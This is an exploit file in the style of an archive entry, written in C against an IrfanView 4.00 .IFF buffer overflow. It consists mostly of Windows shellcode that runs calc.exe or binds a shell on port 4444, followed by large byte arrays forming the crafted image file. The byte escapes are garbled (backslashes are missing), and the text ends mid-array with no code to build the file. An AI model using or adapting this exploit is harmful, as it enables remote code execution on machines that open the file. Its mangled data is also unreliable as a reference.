# Title : IrfanView <= 4.00 .IFF File Buffer Overflow Exploit
# Published : 2007-04-27
# Author : Marsu
/******************************************************************************
* *
* IrfanView <= 4.00 .IFF File Buffer Overflow *
* *
* *
* IrfanView is vulnerable to an unspecified buffer overflow when processing a *
* crafted .IFF file. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
******************************************************************************/
#include "stdio.h"
#include "stdlib.h"
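/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com
 * NOTE(review): the bytes below contain NUL bytes and end in a plain-text
 * "calc.exe", so they look unencoded despite the Encoder= label; if so, the
 * command string is visible to static scanning of the generated file. */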
unsigned char CalcShellcode[] =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01xefx8b"
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01xeex31xc0x99"
"xacx84xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x04"
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb"
"x8bx1cx8bx01xebx89x5cx24x04xc3x31xc0x64x8bx40x30"
"x85xc0x78x0cx8bx40x0cx8bx70x1cxadx8bx68x08xebx09"
"x8bx80xb0x00x00x00x8bx68x3cx5fx31xf6x60x56x89xf8"
"x83xc0x7bx50x68x7exd8xe2x73x68x98xfex8ax0ex57xff"
"xe7x63x61x6cx63x2ex65x78x65x00";
/* win32_bind - EXITFUNC=process LPORT=4444 Size=317 Encoder=None http://metasploit.com */
unsigned char BindShellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68x7exd8xe2x73x53xffxd6xffxd0";
char iff_file_part1[] =
"x46x4fx52x4dx00x01x0bx7ex49x4cx42x4dx42x4dx48x44"
"x00x00x00x14x01xfdx01xb6x00x00x00x00x08x00x01x00"
"x00x00xc7xc7x01xfdx01xb6x43x4dx41x50x00x00x0cx00"
"x1bx1bx19xffxffxffxbcxd7xeaxefx64x2ex73xa9xd2xd9"
"xd9xd9x13x6exb6x00x68xb4x70x70x70xf0x92x6cx2excc"
"xccxfaxf2xe6x99x99x99x50x94xc5xf1xe9xe6xf7xadx32"
"xacxb4xb4x4dx4bx48xf0xc9xb4xabx85x38xe0xe9xefxec"
"xe5xdexefxb4x98x2ex80xbcxe5x98x3ax8cx8cx8cxefxe0"
"xd3xa6xc4xd9x33x33x33x8cxb6xd5xc6xd5xddxfaxf7xf3"
"xfex01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x92x09x45x92x09x4ex12x23x88x02x00x24x12"
"x21x74x00x00x02x92x41x90xfdx90x00x91x10x05x12x20"
"x1cx00x00x00x12x20xecx91xeex18x92x09x70x98xe4xc0"
"x92x3ex6fx92x3ex62x00x02x08x12x24x2cx12x24x04x92"
"x09x45x92x09x4ex12x23xd8x02x00x24x12x21xc4x00x00"
"x02x92x41x90xfdx90x00x91x10x05x12x20x6cx00x00x00"
"x12x21x3cx91xeex18x92x09x70x98xe4xc0xecx3ex6fx92"
"x3ex62x00x02x08x12x24x7cx12x24x54x12x20xe8xafx00"
"x00x92x07x32x00x00x51xafx15xb8xafx00x00x3fxa0x50"
"x12x20xc0x00x00x18x12x23x04x91xeex18x92x07x38xff"
"xffxffx92x07x32x92x06xabx92x06xebx12x23xc8x00x02"
"x80x00x00x00x92x06xabx92x06xebx58x90x08x00x00xb4"
"x00x04x38x00x00x00x00x05x00x00x21xc6x00x00x00xfd"
"xfcx64x92x09x45x92x09x4ex00x65x68x12x20xa8x12x24"
"x54x12x23xe8x91xeex18x12x24x7cx00x00x08x12x23xf8"
"x92x40x2ex15x20xa8x12x21xd0x92x09x70x98xe4xc0x92"
"x40xefx92x40xbbx00x00x00xfdxfcx00x00x80x01x57x00"
"xd0x00x00x36x12x21x70x44x00x5cx00x00x00x0ax00x08"
"x92x3ex88x00x02x1ax00x00x00x92x06xabxe2x00x00x12"
"x24x7cx00x00x64x00x00x00x00x00x10x6fx00x5ax66x00"
"x64xfdxfcx00x12x21xd0x00x00x02x15x20xa0x00x00x7a"
"x58x90x08x44x00x5cx63x00x6fx6dx00x75x6ex00x65x73"
"x00x74x61x00x20x64x00x6ex53x00x20x74x00x65x69x00"
"x74x67x00x6ex00x00x10x12x22x38xafx00x00x92x07x32"
"x00x00x03xafx07x18xafx00x00x45xa6x50x12x22x10x64"
"x00x5cx12x24x54x91xeex18x92x07x38xffxffxffx92x07"
"x32x92x06xabx92x06xebx96x86x20x00x00x0cx00x00x00"
"xafx00x00x12x22x64x00x00x00x92x05xc8x49x7bxc8x12"
"x23x30x92x05x51xafx0bx08x92x05x6dx49x7bxd0x49x7b"
"xd0x49x7bxd4x58x90x00xafx01x78x12x23x30x58x90x08"
"x00x00x00x80x18x98x00x00x00x57x00xd0x12x25x0cx5a"
"x0fx70x12x22xdcx00x00x00x00x01x00x28x54x28x12x25"
"x0cx00x00x09x46x49x47xfdx61x39xd5x01xb6x1bx1bx00"
"xffxffxffxefxeaxd7xa9x73x2exd9xd9xd9x00xb6x6ex70"
"x70xb4x6cx92xf0xfaxccxccx99x99xe6xc5x94x50xf7xe6"
"xe9xb4xacx32x48x4bx4dxabxb4xc9xe9xe0x38xdexe5xec"
"x43x41x4dx47x00x00x00x04x00x00x00x00x42x4fx44x59"
"x00x01x08x42xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xdcx00"
"x00x04xe7x00xdcx00x00x04xe7x00xdcx00x00x04xe7x00"
"xdcx00x00x04xe7x00xc1x00xc1x00xc1x00xeaxffx00xef"
"xf7xffx03xfbxefx3fx78xe8xffx00xf8xdfx00x03x04x10"
"x40x41xe7x00xebx00x00xc0xf4x00x01x41x56xe7x00xdf"
"x00x03x04x30x40xc7xe7x00xeax00x00x18xf7x00x03x03"
"xe0x80x5exe7x00xc1x00xc1x00xc1x00xebxffx01x7fxe7"
"xf7xffx03xfcxa7x7ex72xe8xffx00xf8xddx00x01x01x64"
"xe7x00xdfx00x00x01xffx00x01x60x80xe8x00xebx00x00"
"x80xf6x00x03x05xc8x81x6exe7x00xebx00x01x40x10xf7"
"x00x03x04xa0x40x72xe7x00xc1x00xc1x00xc1x00xebxff"
"x01x3fx87xffxffx00xddxfcxffx05xefxf7xffxe7x9ex66"
"xe8xffx00xf8xeax00x04x60x00xa0x22x01xfex00x07x20"
"x50x08x00x10x01x09x80xe8x00xecx00x05x01x20x69x80"
"xe0x63xffx03x04x01x80x60x70x18xfex00x01xa8x80xe8"
"x00xeax00x04x68x00xa0x22x01xfex00x07x20x50x08x04"
"x14xa1x89x80xe8x00xecx00x05x01x00x18x80xa0x40xff"
"x01x09x00x80x20x40x00x06x04x80xa0x80xe8x00xc1x00"
"xc1x00xc1x00xecxffx10xfex3fx81x7ex4dx97x38x73xb9"
"xfax4fx2fxd3xffxf1x0ex67xe8xffx00xf8xeax00x00x04"
"xffx02x00x08xffx00x08x40x00x01x00x02x00x0ax01x60"
"xe7x00xebx00x0fx02x4axa2xa0x48xc3x04x02x20xa1x54"
"x2ax00x02x20xf0xe7x00xecx00x10x01xc0xcex83xb2xc8"
"xc7x0cx42x00xa1xd0x6ex04x0axf1xf8xe7x00xebx00x05"
"x23xfbxc2xe1xe7x83xffx87x07xc7xf1x78x7ax06x00x20"
"xf0xe7x00xc1x00xc1x00xc1x00xecxffx10xfcx9exe1x9f"
"xccx73x30x7axb1x59x4exf9x19xffxf9x26x63xe8xffx00"
"xf8xecx00x0cx02x40x01x00x22x11x82x07x01x80xc2x22"
"x31xffx00x01x21x52xe7x00xecx00x02x02xd2x45xffx90"
"x0bx5bx42x03x21x90x4bx76x1bx00x04x28xc2xe7x00xec"
"x00x0cx02x40x05x40x32x9dxe2x07x81xc0xc3x2exb7xff"
"x04x01xe9xd6xe7x00xebx00x0bx02x97x83x18x5bx69x9a"
"x8bx45x6bxacx13xffx06x01x20xc2xe7x00xc1x00xc1x00"
"xc1x00xecxffx0cxfdxcex63xd9xf2xefx81xcfxf3xf9xf7"
"xffx3exffxffx01x22x78xe8xffx00xf8xeax00x06x84x00"
"x14x00x5ax00x30xffx00x01x02x40xffx00x01x11x41xe7"
"x00xebx00x0bx02x00x06x12x80x72x30x78x01x00x07x41"
"xfex00x00xcfxe7x00xecx00x09x02x30x84x26x14x10x7a"
"x30x38x20xffx02x04x41x04x02xd1xc7xe7x00xecx00x0a"
"x01x02x10x12x10x08x20x10x7cx34x1bxffx02xffx06x01"
"x04xcexe7x00xc1x00xc1x00xc1x00xecxffx10xfcxc6xe7"
"xcfxf2xe7xc8xffxf7xc9xfcxfex7cxffxfdx33x7exe8xff"
"x00xf8xecx00x06x04x08x00x20x00x80x10xf8x00x01x40"
"x80xe8x00xecx00x0bx05x2bx88x00x03x98x01x00x10x32"
"x02x01xffx00x03x02x03xc1x80xe8x00xecx00x0ax05x29"
"x08x22x0dx98x15x10x00x32x0axffx01x04x04x02xc0xc1"
"x80xe8x00xecx00x11x05xe3x18x06x01x9fxc0x30x07xf6"
"x1bx00x7cx06x04x08xc3x80xe8x00xc1x00x0fx00xc1x00"
"xecxffx11xfcx0exe7xcfxf2xe8x3cxffxe0x39xfcxfex02"
"xffxf9x38x7ex7fxe9xffx00xf8xe9x00x06x20x00x87xd0"
"x00x17xc0xffx00x04x7dx00x0ax00x40xe7x00xecx00x06"
"x03xf3x88x00x03x90x32xffx00x08x32x02x01x83x00x08"
"x04xc1x80xe8x00xecx00x11x07xf9x08x22x0dx9fxd2x90"
"x17xc2x0ax01xfdx04x0axc4xc1x80xe8x00xecx00x10x06"
"x19x18x06x01x98x10xb0x00x16x1bx00x80x06x08x01xc1"
"xe7x00xc1x00xc1x00xc1x00xecxffx0cxf9xe6xe3xd9xf2"
"xefxdex4fxf3xd9xfcxffx7dxffxffx02x3ex4ex7fxe9xff"
"x00xf8xecx00x08x08x14x04x00x14x80x01x00x30xfex00"
"x00x41xe3x00xecx00x0cx08x07x80x06x13x80x40x20x78"
"x12x01x05x43xfex00x00x90xe7x00xecx00x11x08x15x04"
"x26x15x90x01x20x38x02x0bx00x43x04x00xc2x91x80xe8"
"x00xecx00x10x0ax07x10x12x11x88x20x00x3cx26x19x00"
"x41x06x0cx02xa0xe7x00xc1x00xc1x00xc1x00xecxffx11"
"xfbxf4xe1x9fx44xe3x30x73xb1x89xfexb1x14xfcx07x3e"
"x44x7fxe9xffx00xf8xebx00x10x02x01x00xe2x91x02x06"
"x01x10x02x62x39x01x80x00x04x80xe8x00xecx00x10x04"
"x0ax85x90x50x9bx06x8bx21x80x03x36x53x02x34x00x0c"
"xe7x00xecx00x11x0cx0ex05x40xfax9dx27x8ex81x50x0b"
"x6exfbx07xb0xc1x0cx80xe8x00xecx00xffx0cx0ex17x13"
"x50x8bxa8x9ax8bx04x1bxa4x56x06x54x00x26xe7x00xc1"
"x00xc1x00xc1x00xecxffx10xfbxf5xe1x7ex4dxf7x32xf3"
"xb9x7bxe7x3fxd3xf8x07xffxe0xe8xffx00xf8xebx00x01"
"x02x04xffx02x0bx88x08x00x40x00x01x00x02x00x08x00"
"x40xe7x00xebx00x0fx02x82xa2xa0x88xc5x84x02xa0x09"
"x44x2ax03xe8x00x45xe7x00xebx00x0fx02x0ex83xb2x88"
"xcdx0cx42x80x19xc0x6ex03xf8xc0xc5xe7x00xecx00x04"
"x0cx0dx93xe2"
;
char iff_file_part2[] =
"xe1xffx87x09x07x87xc6x01x78x7ax07xe0xc0xd4xe7x00"
"xc1x00xc1x00xc1x00xe9xffx08x7fxffxfdxffxfexffx7f"
"xffxefxfdxffx00xf9xe8xffx00xf8xecx00x00x08xffx00"
"x0dx80xa0x02x00x01x00x80x00x50x28x01x80x00x0exe7"
"x00xecx00x10x08x00x01x80xe0x03x02x03x01x80x00x70"
"x38x01x80x00x0axe7x00xecx00x00x08xffx00x0dx80xa0"
"x02x00x01x00x80x00x50x28x01x80x00x0exe7x00xecx00"
"x00x08xfex00x00xa0xfbx00x05x40x28x01x80x00x08xe7"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xefxc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x41xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x4fxc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xe7xffx01xfex3fxffxffx01xfe"
"x7fxffxffx01xfex73xe6xffx00xf8xe7x00x00x01xf9x00"
"x00x84xe5x00xe7x00x00x01xdcx00xe7x00x01x01x80xfe"
"x00x00x80xfex00x00x8cxe5x00xe6x00x00x40xffx00x00"
"x01xfex00x00x01xe4x00xc1x00xc1x00xc1x00xe7xffx01"
"xfex3fxffxffx00xfexfexffx00xfexe5xffx00xf8xe7x00"
"x00x01xdcx00xe3x00x00x01xe0x00xe7x00x01x01x40xff"
"x00x00x01xfdx00x00x80xe5x00xe3x00x01x01x80xfex00"
"x00x8cxe5x00xc1x00xc1x00xc1x00xe3xffx01xfex7fxff"
"xffx01xfex73xe6xffx00xf8xe6x00x00x40xddx00xe6x00"
"x00xc0xffx00x00x02xfex00x01x01x80xe5x00xe6x00x00"
"x40xfbx00x01x01x80xe5x00xe6x00x00x40xffx00x01x02"
"x80xffx00x01x01x08xe5x00xc1x00xc1x00xc1x00xeaxff"
"x0cxfex78xffx8fx7cx7fx9fxfcx7dxe3xfcx7ex7bxe6xff"
"x00xf8xeax00x01x09x40xffx10x00xd2xfex00x03x80x12"
"x00x44xe4x00xeax00x0cx0cxc2x30xe0xdaxc0xf0x00x97"
"x0ax01x47x4axe5x00xeax00x0cx09xc2x10x70xd2x80x60"
"x00x82x1ax01x45x80xe5x00xeax00x0bx0cx45x10x00x51"
"x40x00x02x01x06x02xc5xe4x00xc1x00xc1x00xc1x00xea"
"xffx0cxf0xa0x0ex03x20x1ex07xfexe4xc0xf0x18x79xe6"
"xffx00xf8xeax00x02x08x40x12xfcx00x03x01x00x08x04"
"xe4x00xeax00x0bx05x47xa2x78x8bx80x60x01x12x7dx07"
"x82xe4x00xeax00x0bx0fx47xb3x78x8bx81x68x03x1bx3d"
"x0fx86xe4x00xeax00x0cx05x97xe2x7cxdfxa0x60x03x16"
"x3cx07xa2x42xe5x00xc1x00xc1x00xc1x00xeaxffx0cxf1"
"xcfx0exf1x21x8cx73xfdxe7x2cx73xccxbbxe6xffx00xf8"
"xeax00x06x09x24x10x12x00x10x80xffx00x03x90x02x16"
"x40xe5x00xeax00x0cx03x04x81x92x04x50x18x00x04x92"
"x12x07x44xe5x00xeax00x0cx0bx2cx91x1ax04x52x8cx02"
"x00x92x06x57xc6xe5x00xeax00x0cx03x0cx03x10x56x00"
"x08x01x00x20x82x45x86xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf1xcfx99xfbx23xc9xf9xfexe7x3fx7fxcex7dxe6"
"xffx00xf8xeax00x06x08x00x01x04x00x04x0axfex00x00"
"x40xe3x00xe9x00x05x20x15x04x00x01x08xffx00xffx40"
"x01x11x80xe5x00xeax00x0cx08x30x45x04x00x04x0ax01"
"x08xc1x40x31x82xe5x00xeax00x0cx02x20x01x00x54x11"
"x08x02x00x41x58x11x04xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf3xdfxcdxffx23xdcx03xfdxe7x3ex27xeexfdxe6"
"xffx00xf8xeax00x04x08x00x10x00x04xfdx00x01x01x40"
"xe3x00xeax00x0bx02x50x40x00x04x20x00x02x08x41x00"
"x29xe4x00xeax00x0cx08x00x12x00x04x35xfax03x08x41"
"x40x01x82xe5x00xe8x00x05x04x00x50x34x02x03xffx00"
"x02x08x01x84xe5x00xc1x00xc1x00xc1x00xeaxffx0cxf3"
"x8fx89xffx27xd9x05xfdxe7x3fx27xc6xfdxe6xffx00xf8"
"xeax00x00x08xffx50xfex00x00x02xfex00xffx28xe4x00"
"xeax00x02x02x10x46xffx00x02x22x00x02xffx00x01x20"
"x21xe4x00xeax00x02x08x50x56xffx00x02x37xfex03xff"
"x00x02x28x29x82xe5x00xeax00x0cx02x00x04x00x50x33"
"x04x03x08x40x60x01x84xe5x00xc1x00xc1x00xc1x00xea"
"xffx00xf3xffx8fx09xffx27xddxffxfdxe7x7fx27xcexfd"
"xe6xffx00xf8xeax00x00x08xffx50xfax00x01x40x20xe4"
"x00xeax00x01x02x40xfex00x06x22x00x02x00x81x00x09"
"xe4x00xeax00x00x08xffx50xffx00x07x36x00x03x00xc0"
"x40x21x82xe5x00xeax00x0cx02x00x06x00x50x36x00x03"
"x08xc1x08x09x84xe5x00xc1x00xc1x00xc1x00xeaxffx0c"
"xf3xefxd8xfbx27xdcxf1xfdxe7xbex67xfexf9xe6xffx00"
"xf8xeax00x03x08x00x01x02xffx00x00x02xffx00x00x20"
"xe2x00xeax00x00x02xffx10x09x02x00x24x06x02x00x20"
"x88x01x06xe5x00xeax00x0cx08x10x01x02x00x30x06x03"
"x00xa1x98x01x86xe5x00xeax00x0cx02x30x44x06x50x35"
"x0cx03x08xa0x88x31x84xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf3xeax8cx49x27xdex37xfexe7xccx75x5exf9xe6"
"xffx00xf8xeax00x03x08x07x10x22xffx00x00x40xffx00"
"x03x18x93x80x08xe5x00xeax00x03x02x22x00xe2xffx00"
"x00xe0xffx00x03x2cx19x10x08xe5x00xeax00x0cx08x07"
"x12xa2x00x12xd4x01x00x3ax9bx80x88xe5x00xeax00x0c"
"x02x2ax80x58x50x12x34x02x08x68x1dx50x8axe5x00xc1"
"x00xc1x00xc1x00xeaxffx0cxfdxe8x7ex03xafxcex07xfd"
"xf7xc0xf8x7ex7bxe6xffx00xf8xeax00x04x02x10x00x04"
"x50xfex00x02x08x01x08xe3x00xeax00x06x0ax13x51xf4"
"x00x01xd0xffx00x03x1ex0bxa0x0axe5x00xeax00x0bx02"
"x13x81xfcx50x21xd0x02x08x3fx0fx81xe4x00xeax00x0c"
"x04x0bx60xf0x88x10xd8x01x10x1ex0bxe0x80xe5x00xc1"
"x00xc1x00xc1x00xe9xffx00xf8xfcxffx00xfcxffxffx02"
"xfcx7fxf3xe6xffx00xf8xe9x00x02x07x00x10xfcx00x03"
"x10x03x80x02xe5x00xe9x00x02x05x00x70xffx00x00x60"
"xffx00x03x1cx02x80x0axe5x00xe9x00x02x07x00x10xfc"
"x00x03x10x03x80x0axe5x00xe7x00x00x10xfex00x02x02"
"x00x14xffx00x00x02xe5x00xc1x00xc1x00xc1x00xe3xff"
"x00xfexe1xffx00xf8xc1x00xe3x00x01x02x80xe1x00xc1"
"x00xdex00x00x0cxe5x00xc1x00xc1x00xc1x00xe3xffx00"
"xfexfdxffx00xf3xe6xffx00xf8xc1x00xe3x00x00x01xfd"
"x00x00x10xe5x00xe3x00x01x01x80xe1x00xe3x00x01x01"
"x80xfex00x00x04xe5x00xc1x00xc1x00xc1x00xe3xffx01"
"xfex7fxfexffx00xf7xe6xffx00xf8xe3x00x01x01x80xfe"
"x00x00x04xe5x00xdex00x00x14xe5x00xe3x00x01x01x80"
"xfex00x00x04xe5x00xdex00x00x1cxe5x00xc1x00xc1x00"
"xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xe7xffx00xdfxddxffx00xf8"
"xe7x00x01x10x04xddx00xe7x00x01x30x04xddx00xe7x00"
"x01x10x04xddx00xe7x00x01x30x04xddx00xc1x00xc1x00"
"xc1x00xe8xffx06xfexefxd9xf6xbexfdxf8xe2xffx00xf8"
"xe7x00x06x60x0cx28x43x08x00x80xe2x00xe8x00x07x01"
"xf0x3ex31x80x06x07x80xe2x00xe7x00x06x80x10x30x82"
"x0cx00x80xe2x00xe8x00x07x01xf0x3ax31x02x0ex03x80"
"xe2x00xc1x00xc1x00xc1x00xe8xffx07xfexdfx1dxbfxfb"
"x2cx7ax7fxe3xffx00xf8xe8x00x07x01x80x3cx39xc7x0e"
"x02xb0xe2x00xe8x00x07x03xe0xfex78xc3xdfx87xd0xe2"
"x00xe8x00x03x02x40x00x01xffx00x01x02x70xe2x00xe8"
"x00x07x02xe0x82x69x40x50x86x30xe2x00xc1x00xc1x00"
"xc1x00xe8xffx07xfcxfdxfbx7fxffx9bxdfx3fxe3xffx00"
"xf8xe7x00x06x02xf0xf9x81xe7xa0xb6xe2x00xe8x00x07"
"x03x01xfcx70xc3xcfxc0x7axe2x00xe7x00x06x01x08x09"
"x42x08x40x0exe2x00xe8x00x07x03x00x1cx49x00x08x00"
"x36xe2x00xc1x00xc1x00xc1x00xe9xffx00xfexffxffx05"
"xfex4fxffx6fxfbxe5xe3xffx00xf8xe9x00x02x01x40x1f"
"xffxf1x03x81xe3xf0x14xe2x00xe8x00x07x80x17xd0xe0"
"xc0xf1xfcx0exe2x00xe8x00x06xc0x18x30x01x41x02x08"
"xe1x00xe8x00x02x40x1cx70xffx01x02x03x1cx06xe2x00"
"xc1x00xc1x00xc1x00xe9xffx09xf1x3fx8fx7fxdfxffx73"
"x58xffxe7xe4xffx00xf8xe9x00x09x0bx00x1ex83xc1x80"
"x3cxbdx00x10xe3x00xe9x00x09x07xc0x7fx01xe0xc0xf8"
"x7ex00x08xe3x00xe7x00x02x01x02x01xfex40xe1x00xe9"
"x00x00x01xffx40x03x02x61x00x80xffx00x00x08xe3x00"
"xc1x00xc1x00xc1x00xe9xffx03xddxfexb1xfbxffxffx03"
"xedxdfxbfxe6xe4xffx00xf8xe9x00x09x3ax01x78x03x41"
"x80x3dx0fx40x0dxe3x00xe9x00x03x1cx00xfex07xffxc0"
"x03x1fx3fx80x1exe3x00xe9x00x09x04x00x80x00xc1x40"
"x21x10x80x02xe3x00xe9x00x09x18x00x02x00x41x00x21"
"x38x00x06xe3x00xc1x00xc1x00xc1x00xe9xffx00xdfxff"
"xffx00xfexffxffx01xeexffxffxf7xe4xffx00xf8xe9x00"
"x0ax18x05xe8x06x01x80x07x85xe0x01xa0xe4x00xe9x00"
"x0ax28x03xf8x0fx00xc0x1fx03xf8x0fxe0xe4x00xe9x00"
"x0ax18x06x18x08x01x40x08x86x10x06x60xe4x00xe9x00"
"x0ax38x04x38x00x01x00x10x84x38x0dxe0xe4x00xc1x00"
"xc1x00xc1x00xeaxffx04xefxffxdfxbfxdfxffxffx03xfd"
"x9ex31xfexe4xffx00xf8xeax00x0bx04x00x0fx40x0cx01"
"x80x07x81x7ax00xa0xe4x00xeax00x0bx18x00x3fx80x3e"
"x00xc0x03xe0xfcx01x60xe4x00xeax00x07x0cx00x10x80"
"x12x01x40x04xfex00x00xe0xe4x00xeax00x0bx1cx00x38"
"x00x22x01x00x04x20x00x01xa0xe4x00xc1x00xc1x00xc1"
"x00xeaxffx04x6bxffx18xffxbfxffxffx02xfdxdfxbfxff"
"xffx00x7fxe6xffx00xf8xeax00x0cx5cx00xbcx00x3cx01"
"x80x00xf0x1exc0x00x80xe5x00xeax00x0bxb8x00x7fx00"
"x78x00xc0x03xe0x7fx40x01xe4x00xeax00x00x60xfex00"
"x07x04x01x40x01x10x21xc0x01xe4x00xeax00x0bxc8x00"
"x01x00x64x01x00x02x10x70xc0x01xe4x00xc1x00xc1x00"
"xc1x00xebxffx05xfdx6fxfdxfbxffx27xfexffx04xb3xff"
"xefxfexefxe6xffx00xf8xeax00x0cxc0x02xf0x00xf8x01"
"x80x00xf0x0bxc0x00xd0xe5x00xebx00x0dx03xf0x01xfc"
"x00x70x00xc0x00x7cx07xf0x01xe0xe5x00xebx00x03x01"
"x20x01x08xffx00x07x01x40x00x80x0cx20x00x20xe5x00"
"xebx00x03x02x70x00x1cxffx00x00x01xffx00x04x84x08"
"x70x00xc0xe5x00xc1x00xc1x00xc1x00xebxffx02xfdx7f"
"xefxffxffx00xefxfexffx04xbbxfcx7bxffx93xe6xffx00"
"xf8xeax00x0cx80x07xb0x01xe0x01x80x00x1ex00xf4x00"
"x5axe5x00xebx00x0dx03x00x1fxd0x00xf0x00xc0x00x7c"
"x03xf8x00x3exe5x00xebx00x0dx01x00x08x70x01x00x01"
"x40x00x22x00x08x00x02xe5x00xebx00x06x03x00x1cx30"
"x01x30x01xffx00x01x42x02xffx00x00x12xe5x00xc1x00"
"xc1x00xc1x00xebxffx05x7fxffx8ex7fxffxdfxfexffx00"
"xf6xffx7fx01xffxf7xe6xffx00xf8xebx00x0dxc0x00x1e"
"x80x01xc0x01x80x00x1ex00x3fx80x08xe5x00xe9x00x0b"
"x7fx00x03xe0x00xc0x00x0fx80xfex80x04xe5x00xebx00"
"x00x40xfex00x09x02x00x01x40x00x10x00x41x80x04xe5"
